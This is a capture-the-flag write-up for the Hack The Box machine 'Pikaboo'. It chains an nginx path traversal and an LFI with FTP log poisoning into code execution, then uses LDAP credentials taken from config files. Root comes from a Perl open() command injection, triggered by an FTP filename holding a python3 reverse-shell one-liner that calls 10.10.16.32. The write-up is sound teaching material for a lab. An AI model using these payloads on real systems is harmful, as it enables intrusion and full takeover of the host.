As always, we start with nmap to discover open ports/services.
Nmap Scan
nmap -sC -sV -oA pikaboo 10.10.10.249
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 16:58 EET
Nmap scan report for 10.10.10.249
Host is up (0.12s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 17:e1:13:fe:66:6d:26:b6:90:68:d0:30:54:2e:e2:9f (RSA)
| 256 92:86:54:f7:cc:5a:1a:15:fe:c6:09:cc:e5:7c:0d:c3 (ECDSA)
|_ 256 f4:cd:6f:3b:19:9c:cf:33:c6:6d:a5:13:6a:61:01:42 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Pikaboo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We got three open ports:
21 => FTP
22 => SSH
80 => HTTP
And there is no critical vulnerabilities for these versions. Checked FTP for anonymous login but it’s not allowed, so lets start enumerating port 80
HTTP Enumeration
Going to http://10.10.10.249 we see Pokatdex, Contact and Admin pages. Checking Pokatdex and Contact but both don’t have anything useful, and Admin requires credentials to login.
I tried default credentials like admin:admin and doesn’t work but after i click cancel i notice something interesting.
The page says it’s running on Apache/2.4.38 on port 81, but nmap said it’s running Nginx on port 80. So maybe Nginx is running as a reverse proxy and forwarding the traffic on/admin to port 81 which is running Apache on it.
I know from a previous machine i solved before that there is a path traversal vulnerability in Nginx and this blog describes it.
https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/
Trying what the blog says, and we get Forbidden.
Now lets run FFUF and fuzz for hidden directory.
ffuf -u http://10.10.10.249/admin../FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -t 100 -e php | tee -a nginx-lfi.ffuf
It found javascript directory but gives Forbidden, and there is server-status so lets check it.
There is admin_staging directory lets check it .
Notice that you have to put “/” at the end of admin_staging or it will redirect you to localhost.
While enumerating the dashboard, found nothing helpful but there is page parameter that i guess is vulnerabile to LFI.
Tried including /etc/passwd but doesn’t work, also tried to use php filter wrapper to read the source code of every php file but didn’t find anything useful.
After wasting alot of time i remembered something, we have FTP port open and in server-status file there was a request to /admin/../admin_staging/index.php?page=/var/log/vsftpd.log so lets try to read it.
And we are able to read it, so we have LFI.
We can try FTP poisoning to inject PHP code inside FTP logs and then visit it using our LFI to execute code on the system.
Initial Foothold
First we will connect to FTP and inject simple PHP code to execute id command in the system.
Then we use our LFI vulnerability to read the FTP log file.
Now that we can execute commands on the system lets get a revese shell. First we run a netcat listener and replace id command with a reverse shell.
Then read FTP logs again to execute the PHP code, and we get a shell.
Getting root
While enumeration, i found htpasswd file inside /etc/apache2/ that contains a password hash. Tried cracking it but failed.
admin:$apr1$0.2FVvEK$Xn42uf/ySS5IPTKXfebXM.
Inside /opt directory there is pokeapi which is was’t complete on the site, lets look for hardcoded credentials.
I found credentials inside /config/settings.py.
binduser:J~42%W?PFHl]g
Also found another creds inside /config/settings.py.
ash:pokemon
Also LDAP is running on localhost, so lets try connecting to it to extact everything from the domain.
ldapsearch -x -h 127.0.0.1 -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g' -b "DC=pikaboo,DC=htb"
We found the password for pwnmeow user encoded in base64. After decoding it we get:
pwnmeow: G0tT4_C4tcH’3m_4lL!_
I tried the password with ssh and su and didn’t work, but worked for ftp.
We can’t list any of these directories and nothing to do here, so i returned to the shell and continued enumeration.
Found a cron job that runs this script /usr/local/bin/csvupdate_cron, lets check it.
It’s passing the name of each directory in /srv/ftp to another script, lets take a look at this script.
This perl script is just updating CSV files with ftp uploaded ones. But perl’s open function has command injection vulnerability if implemented in a wrong way, check this link.
https://stackoverflow.com/questions/26614348/perl-open-injection-prevention
If the name of the file contains | character then followed by a string, it will treat this string as command and executes it.
Now we need to upload a file inside any directory in the ftp directory with a | followed by a reverse shell, then the cron job will execute the script and then runs our command and gives us a shell.
First, create a file on your machine and name it test and run a netcat listener, then connect to ftp and execute the following:
cd versions
put test "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"10.10.16.32\",1337));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")';.csv"
Wait for a moment, and we are root!